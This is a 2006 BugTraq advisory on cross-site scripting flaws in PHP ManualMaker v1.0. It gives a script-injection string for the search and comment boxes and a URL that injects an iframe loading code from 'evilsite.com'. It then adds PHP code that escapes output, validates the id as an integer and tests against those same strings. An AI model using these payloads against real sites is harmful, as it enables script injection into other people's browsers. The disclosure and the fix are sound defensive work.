BugTraq
PHP ManualMaker v1.0 Jun 02 2006 03:07AM
luny youfucktard com
PHP ManualMaker v1.0

Homepage:

http://deltascripts.com/phpmanualmaker/

Affected files:

index.php

Search boxes

Comment boxes

XSS proof of concept:

Input in search or comment box:

">">">'><IMG SRC=javascript:alert('XSS')><""><'<"

XSS via URL injection of id:

http://www.example.com/manualmaker/index.php?print=1&id=<iframe src=http://evilsite.com/evilcode.html <

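One way to close both issues on the server side, as an added example that is not PHP ManualMaker's code: encode search and comment text when it is written into the page, and accept `id` only as an integer. The function names and the assumption that `id` is a numeric page identifier belong to this example, not to the advisory.

```php
<?php
declare(strict_types=1);

// Added example: not PHP ManualMaker source. All function names are hypothetical.

// Encode untrusted text for HTML body text or a quoted attribute value.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Assumption: `id` is a numeric page identifier. Anything else yields null.
function parse_page_id(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Echo a search term back into the page, in an attribute and in body text.
function render_search_header(string $query): string
{
    $safe = html_escape($query);
    return '<input type="text" name="search" value="' . $safe . '">'
         . '<p>Results for: ' . $safe . '</p>';
}

// The two inputs quoted in the advisory, used as regression vectors.
$searchInput = '">">">\'><IMG SRC=javascript:alert(\'XSS\')><""><\'<"';
$idInput     = '<iframe src=http://evilsite.com/evilcode.html <';

$html = render_search_header($searchInput);
echo $html, PHP_EOL;

// No markup from the input survives: only the template's own three '<' remain.
var_dump(substr_count($html, '<') === 3);
var_dump(strpos($html, '<IMG') === false);

// The iframe string is rejected; a plain integer is accepted.
var_dump(parse_page_id($idInput));
var_dump(parse_page_id('42'));

// In a request handler, a rejected id ends the request before any output.
$raw = $_GET['id'] ?? '';
$id  = is_string($raw) ? parse_page_id($raw) : null;
if ($id === null && PHP_SAPI !== 'cli') {
    http_response_code(400);
    exit('Invalid id');
}
```

`html_escape()` covers HTML body and quoted-attribute contexts only; values written into a URL attribute or a script block need their own validation or encoding.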
Copyright 2010, SecurityFocus